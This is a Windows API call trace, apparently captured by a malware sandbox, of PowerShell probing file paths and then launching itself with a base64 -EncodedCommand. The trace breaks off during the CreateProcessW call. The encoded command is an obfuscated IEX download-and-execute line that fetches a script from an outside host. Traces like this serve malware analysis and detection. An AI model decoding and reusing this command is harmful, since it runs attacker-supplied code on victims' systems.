	[0359.482] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.482] SetErrorMode (uMode=0x1) returned 0x1
	[0359.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.482] SetErrorMode (uMode=0x1) returned 0x1
	[0359.482] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.483] SetErrorMode (uMode=0x1) returned 0x1
	[0359.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.483] SetErrorMode (uMode=0x1) returned 0x1
	[0359.483] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.483] SetErrorMode (uMode=0x1) returned 0x1
	[0359.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.483] SetErrorMode (uMode=0x1) returned 0x1
	[0359.484] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.484] SetErrorMode (uMode=0x1) returned 0x1
	[0359.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.484] SetErrorMode (uMode=0x1) returned 0x1
	[0359.484] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.484] SetErrorMode (uMode=0x1) returned 0x1
	[0359.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.485] SetErrorMode (uMode=0x1) returned 0x1
	[0359.485] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.485] SetErrorMode (uMode=0x1) returned 0x1
	[0359.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.485] SetErrorMode (uMode=0x1) returned 0x1
	[0359.485] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.486] SetErrorMode (uMode=0x1) returned 0x1
	[0359.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.486] SetErrorMode (uMode=0x1) returned 0x1
	[0359.486] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.486] SetErrorMode (uMode=0x1) returned 0x1
	[0359.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.487] SetErrorMode (uMode=0x1) returned 0x1
	[0359.487] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.487] SetErrorMode (uMode=0x1) returned 0x1
	[0359.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.487] SetErrorMode (uMode=0x1) returned 0x1
	[0359.487] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.487] SetErrorMode (uMode=0x1) returned 0x1
	[0359.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.488] SetErrorMode (uMode=0x1) returned 0x1
	[0359.488] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.488] SetErrorMode (uMode=0x1) returned 0x1
	[0359.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.488] SetErrorMode (uMode=0x1) returned 0x1
	[0359.488] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.489] SetErrorMode (uMode=0x1) returned 0x1
	[0359.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.489] SetErrorMode (uMode=0x1) returned 0x1
	[0359.489] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.489] SetErrorMode (uMode=0x1) returned 0x1
	[0359.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.490] SetErrorMode (uMode=0x1) returned 0x1
	[0359.490] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.490] SetErrorMode (uMode=0x1) returned 0x1
	[0359.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.490] SetErrorMode (uMode=0x1) returned 0x1
	[0359.490] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.491] SetErrorMode (uMode=0x1) returned 0x1
	[0359.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0359.491] SetErrorMode (uMode=0x1) returned 0x1
	[0359.491] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.491] SetErrorMode (uMode=0x1) returned 0x1
	[0359.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0359.492] SetErrorMode (uMode=0x1) returned 0x1
	[0359.492] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.492] SetErrorMode (uMode=0x1) returned 0x1
	[0359.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0359.492] SetErrorMode (uMode=0x1) returned 0x1
	[0359.492] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.492] SetErrorMode (uMode=0x1) returned 0x1
	[0359.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0359.493] SetErrorMode (uMode=0x1) returned 0x1
	[0359.493] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.493] SetErrorMode (uMode=0x1) returned 0x1
	[0359.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0359.493] SetErrorMode (uMode=0x1) returned 0x1
	[0359.494] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x3cb540
	[0359.494] FindNextFileW (in: hFindFile=0x3cb540, lpFindFileData=0x1c80dc50 | out: lpFindFileData=0x1c80dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0359.494] FindClose (in: hFindFile=0x3cb540 | out: hFindFile=0x3cb540) returned 1
	[0359.495] SetErrorMode (uMode=0x1) returned 0x1
	[0359.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c80dd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0359.495] SetErrorMode (uMode=0x1) returned 0x1
	[0359.495] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c80df70 | out: lpFileInformation=0x1c80df70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0359.496] SetErrorMode (uMode=0x1) returned 0x1
	[0359.497] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0359.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0359.497] CoTaskMemFree (pv=0x1b7a8e30) 
	[0359.498] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0359.498] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0359.498] CoTaskMemFree (pv=0x1b7a8e30) 
	[0359.501] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0359.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0359.501] CoTaskMemFree (pv=0x1b7a8e30) 
	[0359.511] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0359.511] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0359.511] CoTaskMemFree (pv=0x1b7a8e30) 
	[0359.546] CoTaskMemAlloc (cb=0x3b) returned 0x1b7d45a0
	[0359.547] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c80e158, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c80e158) returned 0x4550
	[0359.547] CoTaskMemFree (pv=0x1b7d45a0) 
	[0359.550] GetConsoleWindow () returned 0x10224
	[0359.557] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0359.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0359.558] CoTaskMemFree (pv=0x1b7a8e30) 
	[0359.559] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0359.559] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0359.559] CoTaskMemFree (pv=0x1b7a8e30) 
	[0359.564] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0359.564] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0359.565] CoTaskMemFree (pv=0x1b7a8e30) 
	[0359.567] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c80e1a0 | out: pNumArgs=0x1c80e1a0) returned 0x1b7bfed0*=""
	[0359.569] lstrlenW (lpString="-EncodedCommand") returned 15
	[0359.570] CoTaskMemAlloc (cb=0x22) returned 0x1b7e7ae0
	[0359.570] RtlMoveMemory (in: Destination=0x1b7e7ae0, Source=0x1b7bfef2, Length=0x20 | out: Destination=0x1b7e7ae0) 
	[0359.570] CoTaskMemFree (pv=0x1b7e7ae0) 
	[0359.570] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0359.570] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7d96a0
	[0359.570] RtlMoveMemory (in: Destination=0x1b7d96a0, Source=0x1b7bff12, Length=0x2f2 | out: Destination=0x1b7d96a0) 
	[0359.570] CoTaskMemFree (pv=0x1b7d96a0) 
	[0359.571] LocalFree (hMem=0x1b7bfed0) returned 0x0
	[0359.571] CoTaskMemAlloc (cb=0x804) returned 0x1b7e02e0
	[0359.571] GetConsoleTitleW (in: lpConsoleTitle=0x1b7e02e0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0359.572] CoTaskMemFree (pv=0x1b7e02e0) 
	[0359.580] CoTaskMemAlloc (cb=0x38e) returned 0x1b7bfed0
	[0359.580] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c80e100*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f923e8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand 